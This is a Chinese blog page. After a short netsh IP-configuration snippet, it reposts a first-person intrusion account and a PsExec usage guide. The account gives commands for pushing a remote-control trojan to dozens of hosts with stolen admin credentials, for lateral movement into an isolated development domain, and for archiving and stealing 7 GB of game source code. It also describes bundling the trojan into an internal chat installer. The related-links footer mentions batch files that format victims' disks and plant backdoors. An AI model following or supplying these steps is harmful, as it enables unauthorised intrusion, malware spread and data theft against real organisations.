`
ckf53390
  • 浏览: 27609 次
文章分类
社区版块
存档分类
最新评论

Psexec.exe用法

 
阅读更多

Runtime.getRuntime().exec( "Netsh interface ip set address local static 10.0.0.9 255.0.0.0 10.0.0.1 1");

local - 接口名称
static - 设置使用本地静态配置设置IP地址。 
10.0.0.9 - 要修改的ip
255.0.0.0 - 子网掩码
10.0.0.1 - 网关,如果为none: 不设置默认网关。  
1        -默认网关的跃点数。如果网关设置为 ’none’,则不应设置此字段。

 

Psexec.exe用法(一小段实战) [转载]

拉了个psexec.exe 然后把我的黑洞服务段也传到肉鸡的c:\tmp目录下。。
经过1个多小时的重复操作:
cmd c:\tmp\psexec.exe \\192.168.5.X –u administrator –p 123456 –c Server.exe –d
成功上线的肉鸡有42台。
发现192.168.254.X 这个段的机器中了黑洞也不上线,很是纳闷。。于是判断下这个段到底能不能连接外网。
psexec \\192.168.254.20 –u administrator –p 123456 cmd
ping www.google.com 结果不出所料。。果然不能连接外网。
这个段到底有什么重要的资料?还不能连接外网呢?在肉鸡上打开3389登录器
连接 192.168.254.20 哇塞。发现一个域 SrcServer 肯定是开发部的域了。还好没有限制内网终端连接。
花了2个多小时翻遍了254这个段的机器。终于发现了游戏的源代码。整整7个G啊。
立刻打包: 7z.exe –a tzip gamesrc.zip “c:\src” 打包时间真的的太久了。剩余3个多小时。。。
闲逛一下客服部的网段,发现一个网上邻居的共享文件夹 [FileServer] 看到了一个 内网通 的聊天软件安装端。。如法炮制捆绑上黑洞。。
接着就把游戏源代码拖到了电脑。。。
---------------------------------------------------- psexec的使用
psexec是一个远程执行工具,你可以像使用telnet一样使用它。
它的使用格式为:
psexec \\远程机器ip [-u username [-p password]] [-c [-f]] [-i][-d] program [arguments]
它的参数有:
-u后面跟用户名 -p后面是跟密码的,如果建立ipc连接后这两个参数则不需要。(如果没有-p参数,则输入命令后会要求你输入密码)
-c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)
-d 不等待程序执行完就返回,(比如要让远程机器运行tftp服务端的时候使用,不然psexec命令会一直等待tftp程序结束才会返回)
-i 在远程机器上运行一个名为psexesvc进程,(到底什么用弄不明白)
假设我在远程机器ip有一个账号,账号名是:abc 密码是:123
比如想要用telnet一样在远程系统上执行命令可以打:
psexec \\远程机器ip -u abc -p 123 cmd
如果想要远程机器执行本地c:\srm.exe文件可以打:
psexec \\远程机器ip -u abc -p 123 -c c:\srm.exe
如果想要让远程机器执行本地上tftp服务端,(假设tftp服务端在本地c:\tftp32.exe),可以打:
psexec \\远程机器ip -u abc -p 123 -c c:\tftp32.exe -d
分享到:
评论
发表评论

文章已被作者锁定,不允许评论。

相关推荐

    psexec

    可以实现用system用户登陆系统的工具,用法:结束explorer进程后,在cmd中执行:PsExec -i -s -d explorer

    psexec 远程连接工具

    psexec是一个远程执行工具,你可以像使用telnet一样使用它。 它的使用格式为: psexec \\远程机器ip [-u username [-p password]] [-c [-f]] [-i][-d] program [arguments] 它的参数有: -u后面跟用户名 -p后面是跟...

    操作系统的system权限

    用法: 先结束 pv.exe -k -f explorer.exe PAUSE 再运行 PsExec.exe -i -d -s explorer.exe 文件: pv.exe 大小: 61440 字节 修改时间: 2003年2月2日, 1:33:58 MD5: A98E0F4EAF8260CA5190B0D247A7896A SHA1: EAED5E...

    PSTools及使用说明

    包含PsExec.exe在内的全套工具,使用方法主要是注册表删除

    抓取jstack方法及解决system用户执行jstack命令权限问题

    抓取jstack方法及解决system用户执行jstack命令权限问题, 打开cmd窗口,输入命令 jstack -l 49824&gt;&gt;C:/error01.txt 其中49824为tomcat8.0 的pid ; error01.txt 这个可以自己取名字 多输出...PsExec.exe -i -s cmd.exe

    psexec远程安装软件

    PsExec的用法如下:    1)psexec  usage: psexec \computer [-u username [-p password] [-c [-f] [-i][-d] program [arguments]    psexec是一个远程执行工具,你可以像使用telnet一样使用它。  它的使用格式...

    运行system权限工具

    用法:psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-][-a n,n,...] cmd [arguments] computer 指示 PsExec 在指定的一...

    PsTools 2.45(内附12个工具的详细使用方法)

    readme.txt 用实例详细介绍12个工具的使用方法。 PsTools是一个功能强大的远程管理工具包。工具包可谓是小工具里经典中的经典了,否则MS怎么会收购它呢,现在Telnet大部分关了,AT在win7还有,win10已取消,但...

    如何编写批处理文件批处理文件批处理文件

    表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u...

    histstat:netstat的历史记录

    一种简单的方法拖放到系统级命令提示是使用从PSEXEC 。 以管理员身份运行psexec -i -s cmd.exe ,然后运行histstat。 安装 * nix / macOS: sudo pip install histstat Windows(以管理员身份打开cmd.exe): ...

    Dos命令大全

    tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If ...

Global site tag (gtag.js) - Google Analytics